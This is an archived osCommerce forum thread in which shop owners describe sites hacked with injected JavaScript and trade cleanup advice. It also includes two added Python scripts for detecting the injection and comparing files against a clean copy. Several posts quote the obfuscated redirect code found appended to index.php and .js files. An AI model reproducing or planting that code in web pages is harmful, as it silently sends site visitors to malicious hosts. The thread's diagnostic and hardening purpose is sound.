
osCommerce

The e-commerce.

OS Commerce R2.2 Hacked


crazeuk


Hi Guys.

I am quite new to OSCommerce.

I used it for my site which has been live since October 2010.

 

The site was fine until yesterday, when I got a call saying my site was down.

 

In my limited knowledge of PHP, the only changes I noticed are:

the index.php files had

1. the end of the PHP block removed: "?>"

2. the following section was changed:

From:

</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

To:

</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php');  <script language="JavaScript">if(document.cookie.indexOf("udbs=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udbs=1;";document.location=n;}</script> ?><script language="JavaScript">if(document.cookie.indexOf("udbs=1")<0){var j=0,n="";while(j<44)n+=String.fromCharCode("iuuq;0086/238/219/2850byb0dd0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udbs=1;";document.location=n;}</script>

 

Can anyone help with this before it gets hacked again?

 

Thanks in advance.


Follow these steps to clean and secure your website:

 

1) Lock down your site by using an .htaccess password so your customers are not attacked by the hacker's code.

 

2) FTP all of the files to your local machine and use a program like WinGrep to identify and remove all malicious and anomalous files containing hacker code.

 

3) Delete the files on your hosting account before uploading the clean files.

 

4) FTP the clean files back to your hosting account and read and implement the security patches and contributions found in these two threads: Admin Security and Website Security.

 

5) Change all of your passwords: FTP, CPANEL, STORE ADMIN and DATABASE

 

6) Make sure File and Directory Permissions are set correctly. Directories no higher than 755, Files no higher than 644 and the TWO configure.php files no higher than 444

 

7) If your site has been 'black listed' as an attack site by Google, then log into Google Webmaster Tools and submit the site to be re-indexed and verified to be removed from the 'black list'

 

8) Remove the .htaccess password protection so your customers can resume making purchases from your website.

 

9) Monitor your website using the newly installed contributions to prevent future hacker attacks.

 

10) If you feel you cannot perform any of the above steps, ask for help, because if you miss any of these steps your site may remain accessible to the hacker.

 

 

 

Chris


Wow fast response!

 

Thanks for all these tips.

 

I am going to sit down in the next hour or so and make a crack at this.

I did take some basic steps a few weeks ago when the host blocked my account for spam emails.

 

1. .htpassword protected the admin folder

2. renamed the admin folder

3. I no longer use the contact forms from osCommerce, and use my own outside of the installation (should I delete these?).

 

Thanks again.. MUCH appreciated!

 

 


If you want some more info on step 2, ping me a PM and I'll send over a guide.

 

Cheers

 

G


Hi,

 

Same thing with me. One very important question: How DO I implement an .htaccess password? I work with FileZilla and couldn't find a way. Sorry if it's a stupid question, newbie to all this.

 

Thanks

 

usfanshop


Dominique,

 

You can use your hosting account file manager to password protect your site while you're cleaning it -OR- you can create an .htaccess file and an associated htccess_pswrd file.

 

 

 

Chris


Hi All,

 

I got this problem on Friday and it's repeatedly hit my site ever since. I'm going to list what I've found and done so far so hopefully it will help someone else or someone can tell me that I'm being an idiot - I don't mind either way :-)

 

What this thing does

On my site it seems to write the following line of code at the end of all my .js files and all my index.php files

 

if(document.cookie.indexOf("w3c=21")<0){var j=0,n="";while(j<24)n+=String.fromCharCode("iuuq;00:5/74/355/680x4d0".charCodeAt(j++)-1);document.cookie="w3c=21;";document.location=n;}

 

This seems to then redirect my home page to some dodgy sites that are blocked by google. If I remove the link to jquery.js and all other .js files in my home page, I then get my site back but there is still some attempt to link to a dodgy site. By then going in to each index.php file and removing the code I get my site back without further issue

 

1. First of all I followed all the advice already posted to this topic (why wouldn't you).

2. I have applied an .htaccess file to all folders to restrict ability to read the contents (at least I think I have)

3. I've stopped using a local jquery.js and now use the google hosted version and moved the other .js files into the <head> of my index file

4. I've also set permissions on my index files to CHMOD444

5. Switched off FTP (not even I can use it now)

 

Having added IP v5.1 and Security Pro 2 I really hope I've stopped this happening but I can't be sure the code that causes all this in the first place isn't tucked away in a file somewhere, so if anyone finds it I'd really like to know where it is.

 

I love oscommerce and I love the support everyone provides; I hope this helps and if there are any flaws in my actions it would be great if someone could let me know.

 

Thanks all
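The injected line described in the post above has a stable shape: a string shifted by a fixed offset and rebuilt with String.fromCharCode before document.location is set. The following is an added example, not part of the original post, that finds that loop in .php/.js/.html files and logs the decoded target in defanged form; the sample target and all function names are constructed for illustration.

```python
import re
from pathlib import Path

# Decoder loop quoted in this thread: String.fromCharCode("<shifted>".charCodeAt(j++)-1)
INJECT_RE = re.compile(
    r'String\.fromCharCode\(\s*"([^"]+)"\s*'
    r'\.charCodeAt\(\s*\w+\+\+\s*\)\s*-\s*(\d+)\s*\)')
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

def decode_redirect(encoded, shift):
    """Undo the per-character shift and defang the result for safe logging."""
    plain = "".join(chr(max(ord(c) - shift, 0)) for c in encoded)
    return plain.replace("http", "hxxp", 1).replace(".", "[.]")

def scan_text(text):
    """Return (line_number, defanged_target) for each injected loop found."""
    hits = []
    for m in INJECT_RE.finditer(text):
        line_no = text.count("\n", 0, m.start()) + 1
        hits.append((line_no, decode_redirect(m.group(1), int(m.group(2)))))
    return hits

def scan_tree(root):
    """Scan web-served source files under root; return {relative_path: hits}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

def make_sample(target="http://redirect.example.invalid/out.php"):
    """Constructed sample: a page tail with the loop appended after </html>."""
    shifted = "".join(chr(ord(c) + 1) for c in target)
    return ('</body>\n</html>\n<script language="JavaScript">var j=0,n="";'
            f'while(j<{len(target)})n+=String.fromCharCode("{shifted}".charCodeAt(j++)-1);'
            'document.location=n;</script>\n')

if __name__ == "__main__":
    print(scan_text(make_sample()))
```

A clean scan only rules out this one pattern; it says nothing about how the files were modified in the first place.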


Part solution to the problem.

 

Our site was hit with the same thing over the weekend. Our OSC site is getting hacked every two months now. We believe our site was originally compromised months ago by a hacker using the OSC file_manager.php program. We have since secured this file (google it). What we didn't know was that file_manager.php was used to upload a fake cookie_usage.php file that enabled them to upload and change OSC files.

 

Secure the file file_manager.php.

Check for a fake cookie_usage.php file. It should not have code in it referencing file upload functions.

 

Remember before open-source, when hackers had to use the time consuming method of 'trial and error' to find the security holes. Now they just read the open-source code to find the holes. Sorry, but I am losing faith in the idea that open-source leads to higher security over closed-source solutions.


 

Secure the file file_manager.php.

 

 

 

 

NO delete the file_manager.php - it is the most totally useless bit of php coding ever written - unless you're a hacker of course



 

Found lots of nasties in cookie_usage.php, as suggested in the post above. I strongly recommend all to check this file against an original oscommerce file.
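Two posts in this thread recommend checking cookie_usage.php: one says it should not reference file upload functions, the other says to compare it with an original osCommerce file. The following is an added example, not part of the original posts, that applies both checks to a whole tree; it assumes a pristine copy of the same osCommerce release has been unpacked locally, and the function names are hypothetical.

```python
import hashlib
import re
from pathlib import Path

# PHP upload primitives; per the thread, cookie_usage.php has no reason to use them.
UPLOAD_RE = re.compile(rb"move_uploaded_file|is_uploaded_file|\$_FILES", re.I)

def _digests(root):
    """Map each file's path (relative to root, POSIX style) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def compare_to_baseline(live_root, clean_root):
    """Classify live files as modified or extra relative to the pristine copy,
    and flag changed or extra .php files that contain upload handling."""
    live, clean = _digests(live_root), _digests(clean_root)
    report = {"modified": [], "extra": [], "upload_code": []}
    for rel, digest in sorted(live.items()):
        if rel not in clean:
            report["extra"].append(rel)
        elif digest != clean[rel]:
            report["modified"].append(rel)
        else:
            continue  # byte-identical to the distribution, nothing to review
        if rel.endswith(".php") and UPLOAD_RE.search((Path(live_root) / rel).read_bytes()):
            report["upload_code"].append(rel)
    return report

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        for kind, paths in compare_to_baseline(sys.argv[1], sys.argv[2]).items():
            for rel in paths:
                print(f"{kind}: {rel}")
```

Files you changed on purpose (the configure.php files, templates, installed contributions) will also appear as modified, so the output is a review list rather than a verdict.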


Archived

This topic is now archived and is closed to further replies.
